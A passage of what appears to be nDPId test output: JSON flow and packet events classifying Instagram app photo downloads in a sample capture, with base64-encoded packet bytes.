Zmx0ZTsgcWNvbTsgaXRfSVQpDQoNCg=="} +00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900687,"flow_last_seen":1436720900687,"flow_idle_time":7560000,"flow_min_l4_payload_len":253,"flow_max_l4_payload_len":253,"flow_tot_l4_payload_len":253,"flow_avg_l4_payload_len":253,"midstream":1,"thread_ts_msec":1436720900687,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":57936,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-g.ak.instagram.com","url":"photos-g.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e15\/11386524_110257619317430_379513654_n.jpg","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":78,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900690,"flow_last_seen":1436720900690,"flow_idle_time":7560000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":259,"midstream":1,"thread_ts_msec":1436720900690,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00818{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1436720900690,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":325,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":325,"pkt_l4_len":291,"thread_ts_msec":1436720900690,"pkt":"ABsv8H60QPMIw47hCABFAAE3v7dAAEAGS+vAqABnUlUauq1bAFCj1oFKfMvpWoAYDTz8dgAAAQEICgAD63JUYaBjR0VUIC9ocGhvdG9zLWFrLXhhZjEvdDUxLjI4ODUtMTUvZTM1LzExMzc5MTQ4XzE0NDkxMjAyMjg3NDUzMTZfNjA3NDc3OTYyX24uanBnP3NlPTcgSFRUUC8xLjENCkhvc3Q6IHBob3Rvcy1lLmFrLmluc3RhZ3JhbS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEluc3RhZ3JhbSA3LjEuMSBBbmRyb2lkICgxOS80LjQuMjsgNDgwZHBpOyAxMDgweDE5MjA7IHNhbXN1bmc7IEdULUk5NTA1OyBqZmx0ZTsgcWNvbTsgaXRfSVQpDQoNCg=="} 
+00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900690,"flow_last_seen":1436720900690,"flow_idle_time":7560000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":259,"midstream":1,"thread_ts_msec":1436720900690,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-e.ak.instagram.com","url":"photos-e.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e35\/11379148_1449120228745316_607477962_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900692,"flow_last_seen":1436720900692,"flow_idle_time":7560000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":259,"midstream":1,"thread_ts_msec":1436720900692,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57965,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00818{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1436720900692,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":325,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":325,"pkt_l4_len":291,"thread_ts_msec":1436720900692,"pkt":"ABsv8H60QPMIw47hCABFAAE3iBFAAEAGg5LAqABnUlUaueJtAFAE8EMOWjfyZYAYD+bdMQAAAQEICgAD63JZ6ogYR0VUIC9ocGhvdG9zLWFrLXhmYTEvdDUxLjI4ODUtMTUvZTM1LzExNDI0NjIzXzE2MDgxNjMxMDk0NTA0MjFfNjYzMzE1ODgzX24uanBnP3NlPTcgSFRUUC8xLjENCkhvc3Q6IHBob3Rvcy1mLmFrLmluc3RhZ3JhbS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEluc3RhZ3JhbSA3LjEuMSBBbmRyb2lkICgxOS80LjQuMjsgNDgwZHBpOyAxMDgweDE5MjA7IHNhbXN1bmc7IEdULUk5NTA1OyBqZmx0ZTsgcWNvbTsgaXRfSVQpDQoNCg=="} +00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900692,"flow_last_seen":1436720900692,"flow_idle_time":7560000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":259,"midstream":1,"thread_ts_msec":1436720900692,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57965,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-f.ak.instagram.com","url":"photos-f.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11424623_1608163109450421_663315883_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} 
+02377{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1436720900716,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720900716,"pkt":"QPMIw47hABsv8H60CABFAAW+uH1AADkGTewuIUagwKgAZwBQl6CnSNXfj\/UmaIAQAiku5gAAAQEICprfPdsAA+txSFRUUC8xLjEgMjAwIE9LDQpMYXN0LU1vZGlmaWVkOiBTYXQsIDExIEp1bCAyMDE1IDE2OjU3OjA4IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9qcGVnDQpDb250ZW50LUxlbmd0aDogMTUwMDMxDQpDYWNoZS1Db250cm9sOiBuby10cmFuc2Zvcm0sIG1heC1hZ2U9MTIwOTYwMA0KRXhwaXJlczogU3VuLCAyNiBKdWwgMjAxNSAxNzowODoyMCBHTVQNCkRhdGU6IFN1biwgMTIgSnVsIDIwMTUgMTc6MDg6MjAgR01UDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCv\/Y\/+AAEEpGSUYAAQEAAAEAAQAA\/+0AfFBob3Rvc2hvcCAzLjAAOEJJTQQEAAAAAABfHAIoAFpGQk1EMjMwMDA5NjkwMTAwMDBjMzQ3MDAwMDEzNjQwMDAwNjM4NDAwMDA4MzJiMDEwMDBiODUwMTAwODdkZjAxMDAwZDRhMDIwMDlkYTIwMjAwNzY3MzAzMDAA\/9sAQwAGBgYGBgYLBgYLEAsLCxAVEBAQEBUbFRUVFRUbIBsbGxsbGyAgICAgICAgJycnJycnLS0tLS0zMzMzMzMzMzMz\/9sAQwEICAgNDA0WDAwWNSQeJDU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1\/8IAEQgEDwQPAwEiAAIRAQMRAf\/EABwAAAEFAQEBAAAAAAAAAAAAAAUBAgMEBgAHCP\/EABoBAAMBAQEBAAAAAAAAAAAAAAABAgMEBQb\/2gAMAwEAAhADEAAAANnYrv6OWePnpwvl4Ucr5ZqutmsxzGNFZbBKECWI2oX8gp+rqOdscgJarTJrPTiAtUZEnHz0qOljcEskD1c01Rksi2ko7C10FaSJqLDY0bkkglRK+J01IqIm99eIL6jmheWgjCKVJUTsjcmxJXNVG3K1KNr3irtvMCithKVbraoq9cQKb5mse+vydpRzhEXinDIvFyoIspSDsdW4LfVORbSFGS9z0Q07Vapihe24SRFCV8D5p7U4fInJNSacY9CnDoLekTpOusTppdQVRUWk5Z3S6nSOaiisOZWrWqtSjFjqVjcxzA+ktxbdV5FmYfOO1PR5O6tOVN6dGCvruavqOenPG2AT0hWptvhfNzvglTijkaS2WB9FlYElvdXcE7qNkc6sYnO6nwWWwvB6cwHJ3BI+Pk7LqzU7SQPCRiRBzWw1M8o9Wr7h8yd2Yes0RUdMne6nInZbXUcjq0gpefEOw6FZdhsSpo1\/NNSRGRwz8KussbUKdHc9LXYK7JQkHbZE9CMRrLHVuCy6tIhIp+ajbOxDZOaN8kM6b52TRosiOmpWqktXN4fR9WcyxQQ3Mi1m1NxKzxO57gjldCOau1Guh6KocxG0s90jNuePlRqSaiqL7xrhlZBD1ROCogrq0VC86jwXI66CmfUcy84e5MlIKemSZ
RcnZWo5lqOCIVpafMuyjnIKtHOmrjanNWmV0at9VUdlavIty0UHfcNVBHhvASbQRlyCBWndG1xZlpvVXVpuTtPpPHelHPmiqjZJuxJVci8tKRVa6m0Lsg1QJNocO+lKMV1BqVN+Km1zbjrI1P1ZzUr6iNEZRL5ZRw56q6yDgmfWQLsg16ZNg3hkHi+ETQdInbdS4duCJorHU42r7hqMKoMQCnCeAuojkF0F8BRBzhkEpcFpK6im5sQ5GRJU57qi78tptbhTpBzLHQKE7qrwsdX4LS1+Ts9Uc1YWugWOruCfoFCwtRydla3CsLCo7DIlTl6FQm6BQnWuoT9DwSpCoS9DwTdA4JVrqE\/QKOx0ChM6u5EjoeCVY+ZIiIA="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1436720900717,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720900717,"pkt":"ABsv8H60QPMIw47hCABFAAA0wXFAAEAGQ4LAqABnLiFGoJegAFCP9SZop0jbaYAQH+o19wAAAQEICgAD63Sa3z3b"} +02375{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1436720900744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720900744,"pkt":"QPMIw47hABsv8H60CABFAAW+u1hAADkGUttSVRqiwKgAZwBQ4lApkhzMOpIM7IAQAku18QAAAQEIClYLL1sAA+txSFRUUC8xLjEgMjAwIE9LDQpMYXN0LU1vZGlmaWVkOiBTYXQsIDExIEp1bCAyMDE1IDE2OjMyOjE3IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9qcGVnDQpDb250ZW50LUxlbmd0aDogMTEyMjY4DQpEYXRlOiBTdW4sIDEyIEp1bCAyMDE1IDE3OjA4OjIwIEdNVA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0xMjA5NjAwDQoNCv\/Y\/+AAEEpGSUYAAQEAAAEAAQAA\/+0AbFBob3Rvc2hvcCAzLjAAOEJJTQQEAAAAAABPHAIoAEpGQk1EMGYwMDA3NWIwMTAwMDBjZDFlMDAwMDUxNmQwMDAwYTY3YjAwMDBkMzhhMDAwMDQ3MTMwMTAwZDU4MDAxMDA4Y2I2MDEwMAD\/2wBDAAMCAgMCAgMDAwMEAwMEBQgFBQQEBQoHBwYIDAoMDAsKCwsNDhIQDQ4RDgsLEBYQERMUFRUVDA8XGBYUGBIUFRT\/2wBDAQMEBAUEBQkFBQkUDQsNFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBT\/wgARCAKAAoADASIAAhEBAxEB\
/8QAHQAAAAYDAQAAAAAAAAAAAAAAAAECAwUGBAcICf\/EABsBAAIDAQEBAAAAAAAAAAAAAAABAgMEBQYH\/9oADAMBAAIQAxAAAADRJrP1fOIlpAgZgklAaSWREiWQ0hYBBKMG1GQ0mshINSQNKwDZqISVGBpCiEDBAlSiBIUY0GoAhRgEhRMIlm0hLpRTallISS1AgnEASgbEmowbUamIMzBKgaCCgBEs2NLM2INRiSFhiApTEksNJDhobBqHjA10yQHEiSSgCQoARGYJBhCQZgklkCTCgQThDSSzabMzAkuECSUY0gwJJmbEGogIGpiCWaEBSgbNRAk1hiCcJCDUGkGshpCjEkKVJthagbCzEgKMEmYAjNQICzaaWoAhZmxAUYIUZySQsAQcITZqJSxlGVMgDAJCwCUrCEBQYgwoEBQQkzAJBmxKXSBBmbEAGggowSlYBIcQJKloYRrJCQtLEmsASVhiA4kRGYGQUQkk4AQsEwgswbNZNESw2kzUk2awBJdKQg1KQ2ow0ROkNBOpEk1BhBZtEDMASgCCdCMMwuixAcIEBYE2HEjbNYBBOkNAUoSCWTaTCiKSWBthwkkBZAQUGINwDaCjkkhZobDgBCXDE0pYbQThobDiXEicJjalhNIMCSayBCjAEa0ySQ4QJNQYkzMCJYBBrMEEpQIDokIJwkIUoMSToBClAEGtQkEs0YClHRYk1pBIMwbNQYgnSYgLIEBwkICyYhS0tJCxFthwmkKMASVmhAWbEE4TSQsgIGpNBLIRBQaQayBJOAEBwMQFpAkukCQsAg1kwjMMCVgRGahtk4ASFmDYdSCQtbGjUbRJdAkBZDILMTalGxBqU0hLiYmGDXVNCjMaUrANmsIQlZttqUY2w4RFAcShClECQoCSlwmETgBsKNMgZsSTpAgKSIlGYICyESVkBBYBBqJog4E0E4TEB0gQHA00FqGlLhuKTNQINQJJJZgg1KY2ZpImFGNJLDSTWQIWFASXDBBg5BGoAgOEGEajpmg1hCCcIEEswQl5DSTM00EswQFATalGCCUYJJRg2oGCQsxoSswQow0lLgQhSgCDUGkBYEkOEDYdAIJZgk1ESQpQcUhRsSFGCQZgklgEmZg2pZyEBZgglmMiWQkhRgkOBoicSMiWbSDWGJNQBJOAMAKVVMgYiIUahNE4Y2wsNICwNCXUCIlmDRuGk2S1NsLUYIJwRbZrDSAo00GsmINQEkk="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1436720900745,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720900745,"pkt":"ABsv8H60QPMIw47hCABFAAA00CZAAEAGPJfAqABnUlUaouJQAFA6kgzsKZIiVoAQH3QuLQAAAQEICgAD63dWCy9b"} 
+02366{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1436720900872,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720900872,"pkt":"QPMIw47hABsv8H60CABFAAW+QeVAADkGzDdSVRq5wKgAZwBQ4m1aOHmGBPBEEYAQAktTqQAAAQEIClnq0tYAA+t6pEVxjNbEsTo05BJiqWC+y9Cm00IuBsqQ3OjXYmls3ooNNijoaA4JvaGXA6WBNFUSNxldWicRkqfSvQ+ysT9n0voZ+EyJR6Oy8JFg5mjiK3jhnpErGpjhG8skeRODdCdQ2MDy8miGRvQk1oSZFhVmGQ28jcag3sVEigomNJgo2R5DYnSdEiIuyPaJg2JvQlTQl7HH2PCFhjS9CYo0RCdlSaY2qVbA7SVlukMk60Nrou0FvVb7YyZLsTJUNNjXYcKjL2NNBHY6YRIqyEsm+g1byhIVtLCoTuULeROaIZSg30H1KXibE4I6MNQaNsuwl6EmkRW2hNPKHVGvY2h4LXCptXgsREUx4KkzYc6itsZrGceuCUwiNvZ0NlpU4bHVgOMeBQT+hXsW4NkxniYRKY0LOGPOuJ3wxvNY30XInTbyUHSrYx3BbGhCWhOLAjiZyQZFUJdjY3cIt4ZOkJvIlCy+hRiRG+RuPBllCy6VrIsIWMN5wEbUZGNRwXYxYMsCZvBM0SI+CRpDbsamyBbROyZoo8CJEl6E9mJ2S8EM3LEKN5FGYSlBs8UdkxmA2mpRC0zPZ7xJ9CwL8H7GJMEIRrTFqwKrYnyiJkSFrOodENU0wTGWNK2jlI9lfZlilokuhJLsxJCYIN4hejdRoOrIspMTJA01hjZUKPFINeESqCUMEQXvhWETJONsmi4g1wbPQfoNvgSpYMGCvY9YNIqvA3SQSmRLI4YPo2XNMYImYP1DY4jPgTTw2RtDTZj2bUhs0VbI6JdDjHkaG0not6KSwmmsQgk2Q2d8EY0NThbnDb6LikplbG2dZcC3WN4yZoyEhYNBej0BWx7I90tpJlyN42ZDbInnJ1C1j9i4ezDdGzUCRBRluhyJbIYWhtD6NOhqmcKFroh5EphFtxoj0LHA27N4EuzbHNiablHlZGpBOsMNmxNFXQsIyISmhtLI00bJ7F+j1S+jDRaWi3vmNnZe2dMzFsHjJciezaGpgnsUwLB9OsnZ3niE9jVXaWBDK2XAvaENk6N0ekQ2O9mkVid2JeCeikitCaY2qSMSexWxPhK4FBtCR+iXk7ssgLA2L0SCdTorMmVWF2XC0NTE0Jx1GuCltCJQTg1LLSyaM2UJLoSF6DFF9Mw9kaL7IKmI4MmxmzPiZWtisp9MNxiCdRNs2PYXFI7EHTI1SpITxUMwngXpkyZLmoTeRzsWCnZ+DfRVtifokzCxuYoykLQuIaLckmHw90WsHeOLnJ84eDeStIr0XApBloXsSFOuGxPJSo9D4JV5INNsaqEnFWmLKwNNiDhZETR+8N0hPQnDfQ9jUeRJC3L2abSUYrSyXKQvTLUJ0TMDXTG22NpLA+h7pbgbPbEFhURZQjQj9GNi+DZGcFGLsjYTTQlYRp28M2yQyxotDecoU0R2IEl2iJYG4illoT0E0yNMauOGKUSPA0mRrZpNHQ9mUtCe8LiDqwZ6FGTD0YCawPKG6VPR1B6om0oVtJszsT2oPLg1iChibE3sd6Emqj9QlcmEXhv
0J3fFLW0UaJbG7obENhs2LInSGhYWLA09oR2MwU2WaOiiYyFETeCZiGhtrYmeGRtwUYEs5HJsYE8FFhHQyA82YMmWhvJ+luERPJpCaXRrgavgriCd7HBcZJXUMHg9aNwpE0U5guCZyNlQ8sSjo1kSMsTUUFRQbOhYwhtnKP6SOXI1R12JOnuIeq2VMpZgm+hdg0iYglGUXsWqM1gbLTRccdQh6Ku0exnodIIyzBObLeyzRbgl2MPIvcF+DTaqR8HaG7s1kuabRjJ0TpPR2VPJV7KLKyJPRF0V2DRrKEZhaNsjpZo9uNoKHwaJdi0JwbUojVhqtMTJ4I0NdDcP0bBkIaxSOjsCQm08MyRGoPKyP2uPoVQ="} +02372{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1436720900873,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720900873,"pkt":"QPMIw47hABsv8H60CABFAAW+QeZAADkGzDZSVRq5wKgAZwBQ4m1aOH8QBPBEEYAQAktstgAAAQEIClnq0tgAA+t6yOoxEtjJYMe0j6G03geIuahaK1oTHsEliMMTZ8IV3w+jNLnJcKpRQYoNH0Q1owU7ElIg1BvY00M1sKh00GrYYaKmxapIfSuhKlliV5Ggz2ZEdUXqEuURYhcRmGdF6HkVYKkoGKmh3bGvRvDFLCRD9sysMedkSiftieCrscIysGDeGZuR52JNFJwy1gdIqmuE8SC43k2NNmXvnK0LZ7Q9kdYKlspkg9CZoqhXWJtbKpgafXBrJWhOsqdlcjGlMIf02UEyYUEoN\/R3BPJjY2bCG2s0iEvRRNQ+jO4xqKDwyI0ohahosjThi9BIrI7gehuDWUCCJLBXotaGI3Qlg0wJ4IVBKoTow2PA\/UqeR2ILqdQ62OGMraO4hekPhuNoceBSE3cCJmskaK+hP2IZK1kxs+D0NwaUQbYMYurNlQeMoTLYsrBUslTyTGB4bJjIpUh1Csyxlol2o3gucCaI7VzLkaJHRLOOI9DqwQy9GXvictCZRvBROF7M75lwMNqMbA1Q7yIm8GJWsFybGm8jbOi8hKnkr2M2jAtIEustYo61E\/YmmP6L0b3whJbGvRDYcGUzATfFIDVQIw2Oobux01kTo0N6FINdmGBYdKOUophoRJtodkbFVo9gsdiVGqholRuBaWjGKEmDKSSFXnjQZrsSagmHGQ2V6YSOqJlWjZkzB3BjS9mOWLBMSDwqGspicFTSY2vRnKTsOEJT6izJU3UzZMYLFNbFHhcKrhEElmjUHgsGw3eFliqL7LktKtGhuCzshGkdcMxokwNDSEy0x5WRazwkNsaY8bLNjG6JXCGsDRGmNiieYQKFSLNMh9GJBBqDcYmQ\/TLYs4Y5okeCCq6KrROsWRPA\/QgqexNDwJeyORUtLVhijncHacZgTImKglDuKPKPiNMVuBBPFGsVisByZlsa7HsdRZxjrKIyEiLkwMS2JuxPlJTJB8H6bZlkrSN1n4byX0J4EzWxRB5yNNiRbIpUIU6KJCXaHjR8G5KJ9CS9nWBuYG8YG6i9HshCfoTL7I9i9svs2S0igzvAmIqQvhrDHLkQf6KrgpKCatLEWjeRJbOsDeINKDg0ui5F0zaibWWN0bpi9BWZoEHKMpILVMCwVlji1gwwlSnhCVWC+iHqDPofxpWqTM0eNJ
2xqh8YRjmCGxosC24xO6HlDsYiabHsVY3Q2j8FwXDnhHTop2I0ZBKKmqh+g1MksMLJUzHQ4tCWBioqFxpAlEhOSDo8Dagmn2S4NI9pDj9P0qphlFmxt9ob7Q4fDeWdIS9mSomrgesCHk9xVyISbeBYZYqOnkRY6Qi+xNoTGi3wtcJ8IdEGuiiJs+CUCzHWBIwyehKjUWCjSYQ2xehJQkV4bmCDSE3ajpBI9MbbKsnYhMqSE6SoSmxVZQz7F7Cxw52a0Oi4wa6G80SyNISCZNs1kTWjAjbEjBSIX0JgVNEej4YLk6FUNkLSpOMieS4G8EdEeg2KpGUxUsEchDaYw1FYKjISLZtH5xdj6MjnZrR0KQaPJCYqtCpZNBN3Ym8GJNCRoeRqPAyVRi2Jvp8EoJ4hRsvRtEZTjFNsRZ6Lg1GM+iyL6KpBqRssXcg5w2Ui1l6HGqjFFnaPpYhNtEfI6Fk9p+jWy+h1jWBucKo6btHQ1cIbLY6jKwI1kTtCe6OF7GyQ+luTvB+OCeRZE8Cjzw\/QQ2lsbbGNL0REErSTiKuDRksFTw2JZIJTbY1oaZGzXwTzsbdEiLmog0Ji7YqmN+hroiag0PQeUVDI9mcQw6G101ZROVMQtGQ7eH6WaIbNDwsDsK10NpNDbcMrspisEOJISYYqTRU0RDqgVWGQxaXIsvmpFmWPDA8JDDqHRSQsC9DYnnBYhpbF9KmJvaYk7Ktm8jfrhZcJnL5r4twNjbk="} +00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":180,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720900692,"flow_last_seen":1436720900873,"flow_idle_time":7560000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3095,"flow_avg_l4_payload_len":1031,"midstream":1,"thread_ts_msec":1436720900873,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57965,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-f.ak.instagram.com","url":"photos-f.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11424623_1608163109450421_663315883_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} 
+02391{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1436720900875,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720900875,"pkt":"QPMIw47hABsv8H60CABFAAW+G2lAADkG8rJSVRq6wKgAZwBQrVt8zLRbo9aCTYAQAxSDewAAAQEIClRjBa0AA+t+qDhdSVH1chUH1JtbCJY\/b9U\/35z\/AIcB2iAbyHujCEFNZ+I0eU8EOIX\/AEB\/qRwVo9Wlp5znKiVYRroroyxNdVdiE6kdYXRMS3KcwBs+EyuWZYuo52fCGCiRaGhDCm0eStltza5zDLVQe2oxt2qbSrdR5pHTZPJaAK7JTxSrekwfflKFROdJwg5Y1CyNVSaHSVxDS0CVTMOVI9v3UgC122i67XHxCfXa5p2RquKuPMJ1XpUxG6NIvp3blVKRpiVRMtCZ59+YOFU7DcnU6dTOhRpECHZCLSwomfujLIK9xojog5ZGQgQ5VGxza\/YotDtEQRr+RTZe72UhDK0U\/Sg+fuESn9pT0VTtKEFOlWOQYBlU6VNyNOjonUmH0p7LdOTSD6k6C1Oj5p\/wckoMOHKYPO3tlU9WFVKbrygB07fGU4txhOccQn+qSgN0CjqgJbEqm5ow5FksvA7VeZ7f3Tajd904VNW6JjQ5ncntFPTPhDtGVPjVZB91ncoRE8oIyp5N9S4cEODlVJp1JmA5fEBxtqYKqUOqP+\/zSg5U2tcI3K4r1W6whjKbVcNE4l2TyDtij7fIFHV4f3CoGWKuyWKj6ICHjmTYVF4grovG6HUCdTvzon0H6hVh+C1MMIt8ICE07KNwg+cFOZuEeTXFquDtU5vj5onCADRCuEIOGmi9bcI9qe6Hh\/lSnr\/LyBA0QtO6w38TUIwWwCvsgy3VFt7sqxzT7KwyZTqc5blYj3X06flx+dK1UrEqM45DARcbWwqkkymmJC+hEywLVAnRSFLZ0Uh2F02s75QrdN3lqFtZuO1OGwcuGqOAgqpFMWFAx6lcXdgGuiNNzYCtMzGE+FGJWdEJR5BUG9p91xTbqM+Ewy22pp5VKoaLu4\/b5BzCouE52V4uc5eoyu2IHzQgtMrhTPaqXY51NHLYVLteWrXnUbcEx1pUhytVgUIjzlVKH10\/2UhqqcmlOQfGqIDtF7I45NMpzflptJyiG\/dbyiJTaj6ZTiKrbmo5ZHhMMtRKf5RzypychE\/TsrBP6osiBO6jfYoVBq4Jz6ZGNEfUA7KqOaIsRYcFuUx8DCcaZ9QXSpu0cjw7\/pyoI1\/xGLV7rflJtjkMIOwg4rTVSeRlD3WuyIIAXoy5qI\/DENgr4jNzxlPqdUrUhEuZmFfdl26N8xOAjGpXr9KDMp\/b2cg5m4lf8u76E2rRtxKi+mQqYlpb4VNj\/S8YREfJPzBEfKCVMohcObXqr2Vg\/wAoZTxbXnyhp8j25QMIOKL0AdeU2PhcRSg3t3TXfS5FiaY1TvI5B0JrhqnsZU7giFog4OwU4cxkwtBCPLZaoE0nIgeoaJuJatkdORVDu7Toi3xGE7KLogHZdS37K7Ca7OUXI936Koe0CUDyCBTg2qId+6LS11rvzZ\/KZqoJ5brPLTlEqFoVKuOCobMhCqWm1Q6YKtduV+OT5hOoPnKDcL0EYwpFTRQ3Mp0GIELLsnZXv0CudC115sBLwAumQ2Vw7
